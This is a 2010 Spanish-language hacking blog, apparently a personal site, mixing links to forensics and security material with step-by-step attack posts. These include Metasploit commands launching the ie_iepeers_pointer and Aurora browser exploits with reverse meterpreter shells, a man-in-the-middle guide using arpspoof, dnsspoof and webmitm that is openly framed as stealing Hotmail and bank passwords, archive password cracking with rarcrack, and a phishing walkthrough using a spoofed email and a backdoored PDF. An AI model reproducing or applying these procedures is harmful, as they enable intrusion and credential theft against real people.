Últimas entradas »

martes, 6 de julio de 2010

Introducción a la Informática Forense

Holas!, tanto tiempo si apareserme por mi blog :P pero bueno por fin sali de vacaciones asi que ahora les traigo un documento sobre lo que es la informatica forense en windows :)
-----------------------------------------------------------
Este documento no pretende ni tiene la finalidad de convertirse en manual de referencia. Este documento relata los aspectos básicos relacionados en el campo de la informática forense, explicando de una forma simple y concisa las herramientas utilizadas para la captura de evidencias. También explicará los aspectos técnicos relativos a la arquitectura de un sistema Windows. Probablemente esto ayudará al lector a comprender mejor cómo un sistema Windows recopila y almacena la información, ayudando también a entender la arquitectura del sistema.

General:
  • Definición de análisis forense
  • Evidencia Digital
  • RFC3227 (Recolección y manejo de evidencias)
  • Buenas prácticas a la hora de analizar datos
Entorno Microsoft:
  • Cuentas de usuario y perfil de usuario
  • Tipos de Logon en un sistema basado en Windows
  • La Papelera de Reciclaje. Estructura y funcionamiento
  • Archivos de Registro. Estructura
  • Index.dat e Internet Explorer. Estructura y funcionamiento
  • Service Pack, HotFix. Qué es y para qué sirve?
Descarga (Directa)

Fuente: http://www.elhacker.net

martes, 8 de junio de 2010

Penetration Test Specialist "Tutorial"


Bueno tenia tiempo que no pasaba por aqui por inconvenientes de tiempo-trabajo, aqui les dejo un muy buen aporte sacado del horno.

Lo unico es que esta en ingles.

el Curso tiene muchas fuentes importantes que seria bueno que le pusieran mucha atencion.

Disfruten..!!!


Module 0: Introduction
Module 1: Business and Technical Logistics of Penetration Testing
Module 2: Information Gathering
Module 3: Linux Fundamentals
Module 4: Detecting Live Systems
Module 5: Reconnaissance -- Enumeration
Module 6: Cryptography
Module 7: Vulnerability Assessments
Module 8: Malware – Software Goes Undercover
Module 9: Hacking Windows
Module 10: Advanced Vulnerability and Exploitation Techniques
Module 11: Attacking Wireless Networks
Module 12: Networks, Firewalls, Sniffing and IDS
Module 13: Injecting the Database
Module 14: Attacking Web Technologies

Y si quieren mas detalles pasen por la pagina oficial :
http://www.mile2.com/Certified_Penetration_Testing_Specialist_CPTS.html
Donde esta el detalle con el contenido de cada modulo.

Ahora lo importante, los links en Rapidshare (24x100 MB), al descomprimirlo tendran los 3 DVDs.
Tengan paciencia que vale la pena, los que entiendan del tema sabran que no hay muchos cursos de este tipo.

http://rapidshare.com/files/167651603/Certified_Penetration_Testing_Specialist__CPTS_.part01.rar
http://rapidshare.com/files/167663331/Certified_Penetration_Testing_Specialist__CPTS_.part02.rar
http://rapidshare.com/files/167675074/Certified_Penetration_Testing_Specialist__CPTS_.part03.rar
http://rapidshare.com/files/167686833/Certified_Penetration_Testing_Specialist__CPTS_.part04.rar
http://rapidshare.com/files/167698484/Certified_Penetration_Testing_Specialist__CPTS_.part05.rar
http://rapidshare.com/files/167710266/Certified_Penetration_Testing_Specialist__CPTS_.part06.rar
http://rapidshare.com/files/167721204/Certified_Penetration_Testing_Specialist__CPTS_.part07.rar
http://rapidshare.com/files/167732062/Certified_Penetration_Testing_Specialist__CPTS_.part08.rar
http://rapidshare.com/files/167741584/Certified_Penetration_Testing_Specialist__CPTS_.part09.rar
http://rapidshare.com/files/167750214/Certified_Penetration_Testing_Specialist__CPTS_.part10.rar
http://rapidshare.com/files/167758372/Certified_Penetration_Testing_Specialist__CPTS_.part11.rar
http://rapidshare.com/files/167765730/Certified_Penetration_Testing_Specialist__CPTS_.part12.rar
http://rapidshare.com/files/167772547/Certified_Penetration_Testing_Specialist__CPTS_.part13.rar
http://rapidshare.com/files/167779160/Certified_Penetration_Testing_Specialist__CPTS_.part14.rar
http://rapidshare.com/files/167785313/Certified_Penetration_Testing_Specialist__CPTS_.part15.rar
http://rapidshare.com/files/167479956/Certified_Penetration_Testing_Specialist__CPTS_.part16.rar
http://rapidshare.com/files/167567396/Certified_Penetration_Testing_Specialist__CPTS_.part17.rar
http://rapidshare.com/files/167577620/Certified_Penetration_Testing_Specialist__CPTS_.part18.rar
http://rapidshare.com/files/167588144/Certified_Penetration_Testing_Specialist__CPTS_.part19.rar
http://rapidshare.com/files/167599352/Certified_Penetration_Testing_Specialist__CPTS_.part20.rar
http://rapidshare.com/files/167610569/Certified_Penetration_Testing_Specialist__CPTS_.part21.rar
http://rapidshare.com/files/167622701/Certified_Penetration_Testing_Specialist__CPTS_.part22.rar
http://rapidshare.com/files/167634296/Certified_Penetration_Testing_Specialist__CPTS_.part23.rar
http://rapidshare.com/files/167640123/Certified_Penetration_Testing_Specialist__CPTS_.part24.rar

viernes, 14 de mayo de 2010

Hacking Wep

domingo, 2 de mayo de 2010

Una guia hacker del Social Engineering Toolkit

Muy bueno :), recomendado.


Parte 1



Parte 2



Parte 3



Parte 4

sábado, 1 de mayo de 2010

Torpedo recomienda: Linux+ - PyFlag: Interfaz gráfica de usuario para análisis forense

Cover 04/2010

LiNUX+ 5/2010 (65)

En el número:

- PyFlag
- Plantillas Joomla
- Cómo elegir un buen hosting
- Paralelización de procesos
- Plataforma OSOR
- Menores en redes sociales

DESCARGA AQUÍ

sábado, 24 de abril de 2010

Hack RFID: Proxmark3

todabia no lo pruebo :), pero he leido comentarios y sirve :)

---------------------------------------

Proxmark3: Lector/grabador RFID hack LF:125Khz & HF:13,56Mhz

Software - Descargar
Esquema, componentes y datos - Descargar / para Eagle - Descargar

Foro en ingles

http://www.tri-c.edu/career/workforce/Logistics/PublishingImages/rfid-tag.jpg

Fuente: zero13wireless

Social Engineering Attack using the Ubuntu PE Platform

Se_sendEmail_metasploit from mfBaranian on Vimeo.

lunes, 19 de abril de 2010

Antena Sectorial

Hola! bueno, ultimamente he estado creando muchas antenas de wifi y cosas por el estilo asi que aca les dejo una manual :)

fuente: chw.net




Antena Sectorial


La lista con materiales:

-Una placa de PCB de 10x5 cm o mas grande.
-Acido Muriatico
-Agua Oxigenada
-Papel Fotografico brillante
-Una impresora laser
-Una plancha
-Algun abrasivo para lavar ollas
-Cable rg58
-Materiales para soldar con estaño

Lo primero es tener una placa de PCB de cobre y cortarla del tamaño que se fabricara la antena. En este caso fue de 4.5x8 cm

Highslide JS


Highslide JS


Lo siguiente es lavar prolijamente la placa para quitar toda la grasa de encima y tambien para dejarla un poco aspera



Highslide JS


Luego, viene la parte dificil. Es necesario imprimir en papel fotografico brillante con una impresora laser el patron que se convertira mas tarde en nuestra antena.

El patron que yo emplee fue dibujado a partir de los siguientes documentos:
www.exam.cl/descargas/antenabiquad.pdf
www.exam.cl/descargas/antenabiquad2.pdf

Solo dejo la informacion para que uds fabriquen algo de la forma en la que les parezca mas correcto. Posiblemente manejen otras medidas o formas que les llame mas la atencion.

En un principio mencione que el costo de una antena es elevado por que estan hechas con suma presiscion. El patron de esta antena lo dibuje en autocad (que trabaja con 5 decimales de milimetro) y luego lo imprimi en una impresora laser a 1200 puntos por pulgada. Esto significa que elpatron debe quedar con una presiscion de 0.02116 mm, o sea, 2 centecimas de milimetro, bastante bueno si consideramos que hecho en alambre habriamos con mucha suerte logrado 1 mm de presicion.





Se pone el patron boca a bajo y con la ayuda de una plancha muy caliente se procede a presionar el patron con mucho cuidado de no correrlo mientras se calienta y presiona.

Highslide JS


Highslide JS


Luego de unos 3-5 minutos la pieza deberia estar muy caliente y el toner deberia haberse pegado sobre el cobre. Lo qu ehacemos es lanzarlo al agua fria y dejarlo ahi varios minutos hasta que el papel se resblandezca por el agua.



Luego de esto, lo que hacemos, es con mucho cuidado retirar el papel. Si el trabajo esta bien hecho, se puede incluso arrancar como si fuera autoadesivo

Highslide JS


Highslide JS


A continuacion, con cuidado intentamos sacar los restos de papel frotando la superficie con los dedos hasta que se formen cilindros de papel mojado. Hacemos esto hasta que solo quede el tonner sobre la placa de cobre.

Highslide JS




Highslide JS


Te puedes ayudar de un cepillo viejo tambien

Highslide JS


Es posible que el proceso no quede bien y tienes dos opciones. Una es hacer todo el trabajo de nuevo, para ello, necesitaras quitar el toner aderido con la ayuda de un abrasivo suave y detergente





Highslide JS


Highslide JS


o bien, pueden repasar la peladura con un plumon indeleble.

(no tengo foto de eso)

Luego de esto, viene el revelado.

para relevelar el PCB usamos un poco de agua oxigenada (la mas concentrada que pillen) y acido muriatico (clorhidrico).

En una fuente de vidrio o plastica agregan acido muriatico y luego agua oxigenada. A medida que el agua oxigenada entra en contacto con el cobre, lo comiensa a oxidar de inmediato.

Highslide JS


Luego de un rato y de una buena lavada con un abrasivo suave, este es el resultado.

Highslide JS


Lo que hago ahora es soldarlo a un cable RG58 que compre en san anotonio por 350 pesos. Era todo de cobre asi que fue simple.

Highslide JS


Resumen en video:

sábado, 3 de abril de 2010

Google alerta sobre un nuevo ataque para censurar a los opositores del gobierno Chino



Para que vean que tan poderoso es google si se les propone a ser de los malos

Se ha detectado una ola de ciberataques a sitios web de activistas vietnamitas que se oponen a que la empresa del gobierno chino Chinalco invierta en la explotación de recursos minerales en su país.

Según la alerta de Google, los atacantes difundieron programas infectados que decían ayudar a los usuarios vietnamitas a utilizar el teclado en su propio idioma.

Pero los usuarios que lo descargaban acababan infectando su ordenador con un programa espía que, además de registrar sus actividades en la red, lanzaba ataques de negación de servicio a sus sitios web y los convertía en parte de una red zombi.

Google afirma que este ataque es menos sofisticado que el famoso ataque de China a sus clientes que acabó con las buenas relaciones entre la empresa y el gobierno chino. Aún así, se calcula que esta amenaza ha infectado alrededor de 10.000 ordenadores por el momento.

La empresa decidió alertar sobre esta amenaza para hacer que la comunidad internacional "tome la seguridad informática en serio y haga prevalecer la libertad de expresión y opinión".

Los expertos en seguridad también han opinado sobre este tema. "Este incidente demuestra que no todos los ataques están motivados por el robo de datos o dinero. Este debe ser el último ejemplo de hacktivismo y ciberataques con motivos políticos, que son cada vez más frecuentes", dijo George Kurtz, de McAfee.

La empresa china Chinalco tiene pensado comenzar a explotar Bauxita, elemento clave para la creación del aluminio, en la zona central de Vietnam, lo que ha causado grandes discusiones por las repercusiones ecológicas y sociales que esto puede tener, y en Vietnam se ha formado una fuerte oposición hacia esta propuesta.

Fuentes:

Vietnam dissidents targeted in cyberattack The Financial Times

Google Links Web Attacks to Vietnam Mine Dispute The New York Times

Google: Online attacks aimed at Vietnam critics The Associated Press

viernes, 2 de abril de 2010

Torpedo recomienda: Linux+ - Informática forense y Soft. Libre

Linux+ - Informática forense y Soft. Libre

http://lpmagazine.org/system/editions/photo1s/1045/medium/Linux__04_2010_ES.jpg?1270134726

En el número:

- Informática forense y software libre
- Hachoir: Framework para manipular archivos binarios
- Maemo 5: La apuesta de Nokia por el Software Libre…
- Introducción al desarrollo de videojuegos con SDL.NET
- Endian Firewall: un cortafuegos para todos los públicos
- De Claroline a Mentor
- De vender cajas a preocuparse por el cliente

DESCARGA AQUÍ

fuente: Me llegó al e-mail :)

jueves, 1 de abril de 2010

Gary McKinnon, Amenaza de Estado o Hacker Experimentado..?















Entre 2001 y 2002 el inglés Gary McKinnon puso en jaque el sistema de defensa de EE.UU. controlando cientos de PC

Se hizo conocido en internet con el apodo de "Solo" y así -en solitario-, llegó a convertirse en uno de los piratas informáticos más buscados de todos los tiempos. Todo comenzó en 2001 cuando el administrador de redes británico Gary McKinnon (39), estaba desempleado y pasaba los días en su casa ubicada en un tranquilo barrio londinense.

Desde allí y en el plazo de un año se introdujo ilegalmente a 100 redes y más de 300 computadores de la Nasa, el Ejército, la Marina, el Departamento de Defensa y la Fuerza Aérea estadounidense. El pirata puso en jaque los sistemas militares, robando cientos de contraseñas, eliminando 1.300 cuentas de usuario y dañando la red informática de defensa que estuvo fuera de servicio por casi una semana.

Sus acciones lo llevaron a ser detenido inicialmente en 2002, pero la acción judicial quedó suspendida hasta que esta semana un tribunal de Londres recibió una petición de extradición del gobierno de EE.UU. Por ello, McKinnon fue detenido la noche del martes.

En la acusación de 2002, el fiscal Paul McNulty dijo que "McKinnon es responsable del mayor caso de hackeo militar de la historia."

Fuera de combate

El 2001 fue el año de los atentados en el World Trade Center, pero el hacker británico logró mantenerse activo y burló todas las barreras de seguridad por cerca de 12 meses. Uno de los daños que causó afectó a las redes de defensa de Washington D.C., donde mantuvo desconectados de internet y sin acceso a email a unos 2 mil usuarios por tres días, dice la acusación, que incluye un total de ocho cargos en 14 estados diferentes.

Según EE.UU, las pérdidas económicas que causó alcanzan los US$ 900. MM. Mackinnon empleó un mecanismo distinto al usado habitualmente por los hackers y que consiste en instalar un mecanismo conocido como backdoors (puerta trasera) y que da acceso a los PC.

El pirata usó un software que descargó gratuitamente de internet, llamado RemotelyAnywhere. Se trata de una herramienta para empresas que permite tomar el control a distancia de un PC y acceder a los archivos que este posee. La diferencia es que no genera una respuesta de softwares antivirus, como si lo hacen los backdoors.

Para bajar el software, Mackinnon proporcionó el email de su novia y luego instaló copias en los PC del sistema de defensa de EE.UU. Esta pista permitió rastrearlo y determinar que descargó información sensible, pero no clasificada sobre temas como construcción de barcos y municiones.

Tras comparecer ante el juez, el acusado quedó en libertad bajo fianza y con prohibición de usar internet hasta la audiencia de extradición en julio. Según su abogada, McKinnon podría recibir una condena de 70 años de cárcel. Gary McKinnon: administrador de redes

Ex empleado de Corporate Business Technology, una empresa de telecomunicaciones donde trabajó por 10 meses hasta 1999. Se desempeñaba como administrador de redes monitoreando unos 50 computadores. Sus compañeros de trabajo lo definen como una persona tranquila y anodina. Renunció porque le parecía aburrido, pese a que no tenía otras ofertas laborales. Mensajes que dejaba en foros de internet revelan que sabía desbloquear teléfonos celulares y que sabía de sistemas de seguridad .

Nuevo miembro

Holas!
buenos les cuento desde el dia de hoy tendremos a un nuevo
personaje publicando articulos sobre hacking en el blog...
Mr. Montana

Saludos!

viernes, 26 de marzo de 2010

iPhone RFID Reader - Ojala pudiera tener uno xD

The idea behind this project is to see what the iPhone's serial is capable of and to try and have a little fun with RFID along the way. This reader works with the low frequency (125Khz) tags but I have a half working version for MiFARE Hi-Frequency as well. You can read about the details here.

Thanks go out to Netinfinity, the creator of Ubuntu Pentest Edition for referring this video to us.



iPhone RFID Reader from Benjamin Blundell on Vimeo.



fuente: Securitytube

martes, 23 de marzo de 2010

Skipfish, escaner de google

Google, esa empresa que todos conocemos y que tarde o temprano odiaremos, acaba de anunciar un nuevo producto llamado Skipfish, nada mas y nada menos que un escaner de seguridad para aplicaciones web totalmente gratuito y de código abierto.

skipfishscreenimgassist Skipfish, el escáner de Google para  seguridad de aplicaciones web

Segun Google Skipfish no solo es mas rápido que cualquier otra herramienta de su tipo, sino que ademas tiene menos “falsos positivos” y su interfaz es mucho mas sencilla que las demás.

Aunque no cumple con los estándares publicados por el Consorcio de seguridad de aplicaciones Web para los escaners de seguridad en aplicaciones web, es una buena herramienta para tener en cuenta a la hora de realizar nuestros test.

Descargar Skipfish

viernes, 19 de marzo de 2010

I sorry

Holas! bueno les comento...
ya entré al colegio y eso me tiene los tiempos mas limitados
pero aun así seguiré con el blog publicando al rededor de 2
a 3 articulos por fin de semana(considerando el viernes)

Espero que sigan leyendo el blog y eso :D

bye!

domingo, 14 de marzo de 2010

[Metasploit] ie_iepeers_pointer

> use exploit/windows/browser/ie_iepeers_pointer
> set PAYLOAD windows/meterpreter/reverse_tcp
> set SRVHOST
> set SRVPORT (80)
> set LHOST
> set URIpath test.html
> exploit

Internet Explorer iepeers.dll use-after-free - Demo from Chris John Riley on Vimeo.

viernes, 12 de marzo de 2010

Ni si, ni no...

Bueno...Ultimamente como quisas mas de alguno se a dado cuenta... la web habia estado off
y era porque estaba con todo el asunto de renovacion de dominio, etc...

Ahora entré a la escuela asi que lo mas probable que el fuido de temas que publicaba acá
sea menor ahora pero no significa que deje el blog a un lado :)

y eso...

les dejo un documento de Esteganografía muy bueno que encontré en dragonjar :)

AQUI


Bye!

jueves, 4 de marzo de 2010

Torpedo recomienda: Linux+ - Seguridad y Ethical Hacking!

Todabia no la termino de leer pero en lo que llevo está bueno :)
Descargar acá!


martes, 2 de marzo de 2010

DNSwalk con Backtrack4

Holas!
El día de hoy les traigo esta tool llamada DNSwalk :).
Antes que todo para los que no tengan o no usen el Backtrack4, acá les dejo el link de descarga:
AQUI
o para los que usen Ubuntu:
$ sudo apt-get install dnswalk

Ruta: /pentest/enumeration/dns/dnswalk

Opciones:

-r Recursively descend subdomains of domain
-i Suppress check for invalid characters in a domain name.
-a turn on warning of duplicate A records.
-d Debugging
-m Check only if the domain has been modified. (Useful only if dnswalk has been run previously.)
-F Enable "facist" checking. (See man page)
-l Check lame delegations

Uso:

# ./dnswalk . > logfile.txt

Ejemplo:

# ./dnswalk -framd webvictima.com. > resultado.txt

Ojo: Después de la url de la Web va un . (punto).

Video:

jueves, 25 de febrero de 2010

[Metasploit]Pantalla desbloqueada con script del meterpreter

El MSF cada día me gusta mas jajaja :P, ahora les traigo un video de como ingresar a un sistema con el MSF y desbloquear la pantalla :P. Acá dejo la descripción de dondé encontré el video + el video :P

Suerte!



"In this video, we look at a demo of the screen unlock meterpreter script. The script needs SYSTEM privileges and patches the msv1_0.dll loaded by lsass.exe so that every password will be accepted to unlock the screen. (the patch can also be undone to get back to normal behavior). Currently Windows XP SP2 and SP3 are supported. You can download it from here. The script author's blog has more details.
Thanks go out to PaulDotCom for uploading this to vimeo"

Meterpreter Screensaver unlock script from PaulDotCom on Vimeo.

[Metasploit] Intrusion Automatizada con Nmap y MSF

Bueno... jajaj esto comprueba mi "teoría" de que el bug del puerto 445 ya algo antiguo
pero no por eso deja de ser un bug con buena explotación.

Este video básicamente trata encontrar una victima con el puerto 445 explotable y que con el
Metasploit automatizar una analisis y ver cual es el mejor exploit para usar :), realmente bueno :).

Suerte!

LINK DEL VIDEO



PD: Autor del video: Progresive Death

miércoles, 24 de febrero de 2010

Cracking de archivos comprimidos con BT4 y Rarcrack

Buenas :)!
El día de hoy les traigo un manual + video de como crackear archivos comprimidos como
zip ,rar y 7z con clave, con una tool llamada rarcrack del Backtrack4.
Está en ingles pero dejaré la traducción de google acá(para nada recomendado xD) o simplemente vean el video al final de este articulo, pero en todo caso no es un nivel de ingles muy complicado, osea viendo las imagenes y sabiendo aun poco ingles se puede entender fasilmente.

Traducción(mala xD): AQUI

Web del autor: adaywithtape.blogspot.com



Cracking password protedted archive files with rarcrack

There are a large number of password cracking (or to word it in a nice fashion, password recovery) programs available to crack passwords of any number of file type.

Here I will be looking at cracking password protected archive files with rarcrack which is included in the back|track 4 distro.

First lets navigate to rarcrack in back|track, see the help file and which files are located in the rarcrack directory.

cd /pentest/passwords/rarcrack
./rarcrack --help
ls





There are 3 test files included in the rarcrack directory, but lets try rarcrack on some of the files which I created which are on a USB drive; /media/4G/

Starting an attack ;

This below on a zip file created with WinRar;
./rarcrack --type zip --threads 8 /media/4G/TEST6-winrar.zip


This one below on a zip file created in 7-Zip with ZipCrypto encryption;
./rarcrack --type zip --threads 8 /media/4G/TEST-ZipCrypto.zip




This one below on a 7z archive with AES256 encryption;
./rarcrack --type 7z --threads 8 /media/4G/TEST1-AES256.7z
So Slow !

When a crack attempt is started, an xml status file is created in the directory where the archive file is located.
So we can stop the crack and edit the values of the xml file to help speed up the cracking process.




This xml file can be editted to change the character list being used for the crack, in this case as I know the
password is a numerical value, we can edit the xml file so that rarcrack only checks numbers;

nano /media/4G/TEST1-AES256.7z.xml



















Changing the character set to numerical only;


Now we restart the attack on the 7z file and the attack will resume but now only check numerical values;

./rarcrack --type 7z --threads 8 /media/4G/TEST1-AES256.7z










Video on the above using rarcrack can be found here ;

http://blip.tv/file/2816224
or
http://www.youtube.com/watch?v=BMFn-jps3iY


Although I am trying to stick to the back|track tools in my posts, I have to divert somewhat here and mention a Windows tool by Elcomsoft; "Advanced Archive Password Recovery" (ARCHPR).
It is a great tool and Elcomsoft have password recovery tools for a fantastic number of filetypes.


It has an easy interface with various cracking options such as Bruteforce and Dictionary attacks, and is also able to include characters which you think may be correct and mask those you want testing, as in; pass????.

The speed reached is much better in most cases than what rarcrack achieves and also is more flexible on which files can be chosen, although it does not support 7zip created archives.

With rarcrack I was having trouble with it catching the passwords on zip files with AES encryption, ARCHPR has no trouble with these.

ARCHPR in action with bruteforce options ;


































































Dictionary attack ;



























Video:


Explotando Bug de Win7 con Backtrack 4

Hola :) bueno les comento....
Encontré este video que trata de como aprovechar un bug en el puerto 445
del windows7, sinceramente creo que conocía este bug pero para Windows XP
(no tengo muy buena memoria) pero realmente no estoy seguro :)

Exploit : AQUI
Video: AQUI

Local File Disclosure (LFD)

Bueno... un papper de Local File Disclosure :), no está nada de malo, está en ingles paro nada difisil de entender :)

Saludos!

VER PAPPER AQUÍ

martes, 23 de febrero de 2010

Poison-host con PowerPoint

Hi!, les cuento... navegando por hay.. encontré este papper de como
hacer poison-host con un powerpoint... :) el metodo igual es algo
antiguo pero me dio mucha curiosidad el archivo así que igual les
dejo el link :)

AQUI

[SET]Aurora Attack Demo usando Social Engineer Toolkit

Hola! bueno... como publiqué anteriormente, hay un manual de como usar el exploit
ie_aurora con el Metasploit para el bug de IE :), pero ahora les traigo lo mismo
pero de forma mucho mas fácil y rápida con el Social Engineer Toolkit v.04 :)

PD: Ojo debes tener el ie_aurora guardado en el Mestasploit

Suerte!



Aurora Attack usando Social Engineer Toolkit


Pasos:

1.- Yo estoy usando el BT4 pero venía con el SET v0.3 así que lo primero será actualizarlo.
# svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

2.- Ejecutamos el SET (Backtrack>penetration) y seguimos esta secuencia:

2. Website Attack Vectors
2. Clone and setup a fake website
2. The Metasploit Browser Exploit Method
Enter the url to clone: http://www.webclonada.com
1. Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
2. Windows Reverse_TCP Meterpreter
msf exploit(ie_aurora) > sessions -i 1
meterpreter > shell

Y listo! :D
Es muy facil!, acá les dejo un video de muestra;

Social-Engineer Toolkit v0.4 Aurora Attack from David Kennedy on Vimeo.

lunes, 22 de febrero de 2010

Ataque MITM by Rx

Un buen manual, quisas algo antiguo pero sige siendo igual de bueno :)

Saludos!




Hola, bueno... estaba pensando en mostrar una de las técnicas que más uso, el Man-In-The-Middle (MitM). Usaré esta técnica para mostrarles que tan fácil puede ser robar las contraseñas de Hotmail (o cualquier otra cosa) en red, sin usar remote exploits ni nada parecido.

Primero debemos obviamente estar en la red, con una terminal linux (ya sea un LiveCD, de seguro despues enseño como crear nuestra propia LiveCD personalizada). Debemos asegurarnos que tenemos instalada la herramienta DSniff...

Bueno, suponiendo que la tenemos... vamos a activar el ip_forwarding, para que la conexion pase por nosotros y asi ponernos en medio sin problemas, con el siguiente código

# echo 1 > /proc/sys/net/ipv4/ip_forward

Luego de esto envenenaremos la tabla ARP de la victima, para hacerle creer a la maquina victima, que nuestra mac address es el router (o la máquina que le proporciona internet).

# arpspoof -t ip_victima ip_router

Ahora solo debemos conseguirnos un certificado SSL... pero hay un programa que lo hace por nosotros (el webmitm). Solo debemos ejecutarlo sin argumentos y comenzará a hacernos preguntas para crear el certificado.

Ya creado el certificado, deberemos crear un archivo con extension .hosts con los nombres de dominio a controlar, de la forma:

ip_atacante *.passport.com
ip_atacante *.hotmail.com
ip_atacante *.passport.net
ip_atacante *.msn.com
ip_atacante *.bbva.cl // tambien podemos robarnos las cuentas bancarias!


la guardamos como hotmail.hosts

Solo nos queda activar el sniffer, para que atienda las peticiones de estas webs

# dnsspoof -f hotmail.hosts

Y finalmente, activar nuestro queridísimo programa...


# webmitm -d


Hecho esto, tenemos que esperar... en la PC víctima, cada vez que ingrese a una de esas webs le saldrá el certificado, pero en promedio nunca lo leen y aceptan (la desesperacion de entrar en su correo), con esto ingresarán a su correo normalmente escribiendo sus datos... Cosa que nosotros desde nuestra terminal observaremos y anotaremos detallada y detenidamente...

Ven que el hacking no es tan dificil ??



Escrito por RX

domingo, 21 de febrero de 2010

[Metasploit] Adobe Exploit :)

En ingles :) , el que sabe, sabe y el que no usa el traductor de google XD

Aquí en Español


Fuente: http://www.question-defense.com/



Using an Adobe Exploit in a Email Attack

This attack takes advantage of a vulnerability in Adobe Reader and Acrobat. The official release is here. Adobe has been informed of this vulnerability for well over a month now and has issued a statement that it will release a fix on January 14th. It is a scary thought that this exploit will be live and in the wild for almost 2 months before Adobe decides to fix it. I am making this post in order to make people aware of how such a attack can take place and how easy it is to implement.

I will be using the Metasploit framework and Backtrack Linux in order to launch this attack.

So starting out as the attacker the first thing we need to do is craft a .pdf which contains the malicious code that will trigger the vulnerability in Adobe.

As you can see I created a .pdf with a perfectly legit looking name. I also added the Meterpreter “Backdoor” to the file with instructions to connect back to my attacking machine on port 8080 when it is opened. Most firewalls are not configured to inspect out going requests so this is a fairly effective way to bypass any firewall.

The next thing to do is craft a email which we will send to our victim. I mainly choose this method of attack in order to demonstrate how easy it is to send a spoofed email.

So what I have done here is created a official looking email which looks like it came from techsupport@adobe.com. I didnt spend a ton of time on this but you can belive a real attacker will make this thing look “very” official. This email could be sent to literally thousands of people a hour. This is one of the reasons to keep your databases of emails secure because attackers will use them in this way.

Okay so the last thing we need to do is start our “Listener” . This is the process that will be waiting for the victim computers connection once the malicious .pdf is opened.

You will notice that I started the handler with the same payload, port and ip address which I used when I crafted the .pdf file file. This is a crucial step or the attack will not work.

Ok so now that we are all set, lets take a look at our victim….

There is our email in the victims gmail box. Looks perfectly normal doesn’t it?

Next our victim goes to download the .pdf so he can open it at his convenience later.

Notice how I highlighted in bright red that this computer is running a up to date version of the anti virus avast. The Meterpreter backdoor is not detected by antivirus. Our victim could scan this .pdf with 10 different anti-virus and it would come up clean each time.

Next our poor guy will open the .pdf only to find to his dismay its blank and starts creating some stability issues for Adobe.

Now we could have added some official looking text into this .pdf with real security instructions and stuff but I did not. Once again you can believe an attacker will go through the trouble of making it look very official.

So meanwhile back at the ranch where we have been patiently waiting…….

As soon as our poor victim opened the .pdf file, our backdoor reached out and connected to the attacker machine.

Thats it!

So what did we learn?